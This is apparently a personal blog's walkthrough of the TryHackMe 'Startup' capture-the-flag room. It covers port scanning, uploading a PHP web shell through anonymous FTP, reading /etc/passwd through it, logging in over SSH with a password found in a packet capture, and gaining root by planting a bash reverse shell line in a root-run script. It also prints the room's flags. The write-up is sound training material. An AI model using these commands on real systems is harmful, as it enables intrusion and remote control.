~/ Home Projects Tools Link
Writeups
hackthebox/
  • 2million
  • Facts
  • Checkpoint
  • Enigma
  • Nimbus
  • Reactor
  • tryhackme/
  • Wonderland
  • Highschool
  • Ignite
  • JokerCTF
  • Lazy Admin
  • Lightroom
  • Lookup
  • Love Connect
  • Love note
  • Pyrat
  • Startup
  • Tryheartme
  • Valenfind
  • Valley
  • When hearts collide
  • Writeups

    THM Startup


    Recon:

    We first get all our exposed ports from Nmap, to see what we can work with. After that, we want to see what is the structure of the website, we’ll use FFUF to enumerate addresses we can work with.

    nmap -sV -sC -v 10.65.146.102

    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     vsftpd 3.0.3
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    | drwxrwxrwx    2 65534    65534        4096 Nov 12  2020 ftp [NSE: writeable]
    | -rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
    |_-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
    | ftp-syst: 
    |   STAT: 
    | FTP server status:
    |      Connected to 192.168.189.141
    |      Logged in as ftp
    |      TYPE: ASCII
    |      No session bandwidth limit
    |      Session timeout in seconds is 300
    |      Control connection is plain text
    |      Data connections will be plain text
    |      At session startup, client count was 1
    |      vsFTPd 3.0.3 - secure, fast, stable
    |_End of status
    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA)
    |   256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA)
    |_  256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519)
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    | http-methods: 
    |_  Supported Methods: OPTIONS GET HEAD POST
    |_http-title: Maintenance
    Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

    Lets test the ftp first with anonymous

    We need a password for anonymouse@ftp

    ffuf -w /usr/share/SecLists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-small.txt:FUZZ -u http://10.65.146.102/FUZZ

    We ran some strings cmd xxd and binwalk on the important.jpg hoping for some steganography There wasn’t #### Tried ftp again this time anonymous connected #### Tried dumping a php shell but it didn’t work at first however /ftp took it We put the shell go to the location in the browser and add our ?cmd=id >uid=33(www-data) gid=33(www-data) groups=33(www-data)

    Now we can target the recipe we need for the machine @ http://10.65.146.102/files/ftp/shell.php?cmd=cat%20../../../../../recipe.txt

    Someone asked what our main ingredient to our spice soup is today. I figured I can’t keep it a secret forever and told him it was love.

    We do the same to cat /etc/passwd

    root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false lxd:x:106:65534::/var/lib/lxd/:/bin/false messagebus:x:107:111::/var/run/dbus:/bin/false uuidd:x:108:112::/run/uuidd:/bin/false dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin pollinate:x:111:1::/var/cache/pollinate:/bin/false vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash ftp:x:112:118:ftp daemon,,,:/srv/ftp:/bin/false lennie:x:1002:1002::/home/lennie: ftpsecure:x:1003:1003::/home/ftpsecure: 
    We find a file in /incidents called suspicious.pcapng

    Looking through it we find something that looks like a password: >c4ntg3t3n0ughsp1c3

    Lets try the lennie user with our “password” …

    And yes it is lennie’s password for ssh So we: ssh lennie@ip cat user.txt >THM{03ce3d619b80ccbfb3b7fc81e46c0e79}

    If we go to ~/scripts, we find planner.sh and startup_list.txt

    The list is empty but the planner’s code is:

     #!/bin/bash
    echo $LIST > /home/lennie/scripts/startup_list.txt
    /etc/print.sh

    Tried rewritting the planner which didnt work but we have /etc/print.sh to test

    We add a reverse shell: >bash -c ‘bash -i >& /dev/tcp/192.168.189.141/6969 0>&1’

    We get root shell

    Now we just cat root.txt >THM{f963aaa6a430f210222158ae15c3d76d}


    Notes:

    Allowing file inclusion is a critical security issue as it allows an attacker to put any file no matter how malicious it is on a machine. In our case we put a reverse shell and then call to it to have it run certain commands. Also, allowing the editing of files once we are in allow us to insert malicious code to finish the full compromise of the machine.


    Tools: